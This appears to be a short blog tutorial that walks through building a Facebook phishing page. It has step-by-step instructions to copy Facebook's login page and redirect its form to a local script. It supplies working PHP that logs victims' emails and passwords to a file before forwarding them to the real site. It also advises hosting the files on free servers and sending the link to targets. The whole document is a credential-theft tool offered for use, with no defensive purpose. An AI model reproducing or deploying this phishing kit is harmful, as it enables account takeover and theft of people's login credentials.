1. First goto Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.
2. Select all ( CTR + A ) and copy all the code and paste it in notepad.
3. Then search(CTR + F) for the keyword action.You can see the code as given below.
action=”https://www.facebook.com/login.php?login_attempt=1″
4. Just change the above code as mentioned below
action=”pass.php”
after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.
5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php
$fp = fopen(“Passwords.htm”, “a”);
fwrite($fp, “Email:$_POST[email]\tPassword:$_POST[pass]“);
echo “<HTML>
<head>
<FRAMESET cols=\”*\”>
<FRAME SRC=\”http://www.facebook.com\”>
</FRAMESET>”;
?>
Note: ‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘
6. By this step our PHP script is also ready,
7. Now host these 2 files ie,
☛ facebook.html
☛ pass.php
in any of free hosting servers like ripway,drivehq,110 mb or t35.com etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.
8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.
9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there
Thanks..
.
0 comments:
Post a Comment